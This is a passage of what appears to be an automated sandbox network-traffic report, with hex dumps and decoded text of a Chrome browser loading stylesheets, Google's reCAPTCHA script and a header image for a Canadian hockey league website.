                                                                                                                          Data Ascii: width: 20%; } .xlarge-up-6 > .cell { width: 16.66667%; } .xlarge-up-7 > .cell { width: 14.28571%; } .xlarge-up-8 > .cell { width: 12.5%; } } .grid-margin-x.small-up-1 > .cell { width: calc(100% - 1.25rem); } .grid-margin
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 34 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 33 33 2e 33 33 33 33 33 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 35 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 34 31 2e 36 36 36 36 37 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 36 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 37 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 35 38 2e 33 33 33 33 33 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61
                                                                                                                          Data Ascii: apse > .large-4 { width: 33.33333%; } .xlarge-margin-collapse > .large-5 { width: 41.66667%; } .xlarge-margin-collapse > .large-6 { width: 50%; } .xlarge-margin-collapse > .large-7 { width: 58.33333%; } .xlarge-margin-colla
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 20 63 61 6c 63 28 34 31 2e 36 36 36 36 37 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 36 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 35 30 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 37 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 35 38 2e 33 33 33 33 33 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 38 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 36 36 2e 36 36 36 36 37 25 20 2d 20 31 2e 38 37 35 72
                                                                                                                          Data Ascii: calc(41.66667% - 1.875rem); } .grid-margin-y > .medium-6 { height: calc(50% - 1.875rem); } .grid-margin-y > .medium-7 { height: calc(58.33333% - 1.875rem); } .grid-margin-y > .medium-8 { height: calc(66.66667% - 1.875r
                                                                                                                          2025-01-13 21:01:14 UTC15943INData Raw: 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 6c 65 66 74 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 63 65 6e 74 65 72 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 73 70 61 63 65 64 20 7b 0a 20 20 20 6a 75 73 74 69
                                                                                                                          Data Ascii: lock !important; } } .align-left { justify-content: flex-start; } .align-right { justify-content: flex-end; } .align-center { justify-content: center; } .align-justify { justify-content: space-between; } .align-spaced { justi


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.11.2049792137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC610OUTGET /app/plugins/wp-polls/polls-css.css?ver=2.7 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC491INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 2708
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Thu, 05 Sep 2013 00:45:22 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971114 961677436
                                                                                                                          Age: 114
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"5227d422-a94"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC2708INData Raw: 2f 2a 0a 2b 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2b 0a 7c 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 7c 0a 7c 09 57 6f 72 64 50 72 65 73 73 20 50 6c 75 67 69 6e 3a 20 57 50 2d 50 6f 6c 6c 73 09 09 09 09 09 09 09 09 09 09 7c 0a 7c 09 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 32 20 4c 65 73 74 65 72 20 22 47 61 4d 65 72 5a 22 20 43 68 61 6e 09 09 09 09 09 09 09 09 09 7c 0a 7c 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 7c 0a 7c 09 46 69 6c 65 20 57 72 69 74 74 65 6e 20 42 79 3a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 7c 0a 7c 09 2d 20
                                                                                                                          Data Ascii: /*+----------------------------------------------------------------+|||WordPress Plugin: WP-Polls||Copyright (c) 2012 Lester "GaMerZ" Chan||||File Written By:||-


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.11.2049793137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC626OUTGET /app/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.15 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC490INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 359
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677540 961742889
                                                                                                                          Age: 114
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-167"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC359INData Raw: 2e 77 70 6d 6c 5f 63 6d 73 5f 6e 61 76 69 67 61 74 69 6f 6e 20 2e 77 70 6d 6c 5f 74 61 62 6c 65 20 74 68 7b 20 20 20 20 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 44 46 44 46 44 46 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 73 6f 6c 69 64 20 31 70 78 20 23 66 66 66 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 32 30 30 70 78 3b 20 20 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 20 63 6f 6c 6c 61 70 73 65 3b 20 20 0d 0a 7d 20 0d 0a 2e 77 70 6d 6c 5f 63 6d 73 5f 6e 61 76 69 67 61 74 69 6f 6e 20 2e 77 70 6d 6c 5f 74 61 62 6c 65 20 74 66 6f 6f 74 20 74 68 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 20 20 20 20 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                          Data Ascii: .wpml_cms_navigation .wpml_table th{ background-color: #DFDFDF; border-bottom:solid 1px #fff; width:200px; border-collapse: collapse; } .wpml_cms_navigation .wpml_table tfoot th{ border-bottom:none; background:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.11.2049798137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC635OUTGET /app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.15 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC490INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 3004
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677542 960893446
                                                                                                                          Age: 79
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-bbc"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC3004INData Raw: 23 6d 65 6e 75 2d 77 72 61 70 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 0a 20 20 2f 2a 20 72 65 6d 6f 76 65 20 61 6c 6c 20 74 68 65 20 62 75 6c 6c 65 74 73 2c 20 62 6f 72 64 65 72 73 20 61 6e 64 20 70 61 64 64 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 64 65 66 61 75 6c 74 20 6c 69 73 74 20 73 74 79 6c 69 6e 67 20 2a 2f 0a 20 20 2f 2a 20 73 74 79 6c 65 20 74 68 65 20 74 61 62 6c 65 20 73 6f 20 74 68 61 74 20 69 74 20 74 61 6b 65 73 20 6e 6f 20 70 70 61 72 74 20 69 6e 20 74 68 65 20 6c 61 79 6f 75 74 20 2d 20 72 65 71 75 69 72 65 64 20 66 6f 72 20 49 45 20 74 6f 20 77 6f 72 6b 20 2a 2f 0a 7d
                                                                                                                          Data Ascii: #menu-wrap { width: 100%; height: 30px; position: relative; z-index: 100; /* remove all the bullets, borders and padding from the default list styling */ /* style the table so that it takes no ppart in the layout - required for IE to work */}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.11.2049799142.251.16.1064431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC806OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                          2025-01-13 21:01:13 UTC749INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Expires: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2025-01-13 21:01:13 UTC506INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                          2025-01-13 21:01:13 UTC935INData Raw: 28 27 6d 65 74 61 27 29 3b 6d 2e 68 74 74 70 45 71 75 69 76 3d 27 6f 72 69 67 69 6e 2d 74 72 69 61 6c 27 3b 6d 2e 63 6f 6e 74 65 6e 74 3d 27 41 2f 6b 61 72 67 54 46 79 6b 38 4d 52 35 75 65 72 61 76 63 7a 65 66 2f 77 49 6c 54 6b 62 56 6b 31 71 58 51 65 73 70 33 39 6e 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c
                                                                                                                          Data Ascii: ('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJl
                                                                                                                          2025-01-13 21:01:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.11.2049802137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC630OUTGET /app/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.15 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC491INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 2374
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417806 961775440
                                                                                                                          Age: 114
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-946"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC2374INData Raw: 2f 2a 20 73 74 79 6c 65 20 74 68 65 20 6d 65 6e 75 20 6e 61 76 69 67 61 74 69 6f 6e 20 77 72 61 70 20 20 2a 2f 0a 23 6d 65 6e 75 2d 77 72 61 70 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 20 20 2f 2a 20 73 74 79 6c 65 20 74 68 65 20 74 6f 70 20 6c 65 76 65 6c 20 68 6f 76 65 72 20 2a 2f 0a 20 20 2f 2a 20 6d 65 6e 75 20 73 65 63 74 69 6f 6e 73 20 77 69 74 68 20 63 68 69 6c 64 72 65 6e 20 2a 2f 0a 20 20 2f 2a 20 73 74 79 6c 65 20 73 65 63 74 69 6f 6e 73 20 66 72 6f 6d 20 74 68 65 20 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 73 20 2a 2f 0a 7d 0a 23 6d 65 6e 75 2d 77 72 61 70 20 75 6c 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 37 39 38 64 30 3b 0a 20 20 2f 2a 20 73 74 79 6c 65 20 74 68 65
                                                                                                                          Data Ascii: /* style the menu navigation wrap */#menu-wrap { background-color: #eee; /* style the top level hover */ /* menu sections with children */ /* style sections from the dropdown menus */}#menu-wrap ul { background-color: #5798d0; /* style the


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.11.204980454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC665OUTGET /app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:13 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 64482
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Last-Modified: Thu, 05 Sep 2019 18:44:21 GMT
                                                                                                                          ETag: "02b9b75e50891266abdbb5c111155a82"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 dc81af6f14945ade0fd126a735f82ac2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: QdvrurbbRvMCHOrokLHTCxo317xY4nr_gnV-gAqTUO9-hCFILq9EgA==
                                                                                                                          2025-01-13 21:01:13 UTC6396INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 c0 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c
                                                                                                                          Data Ascii: JFIFExifII*http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xml
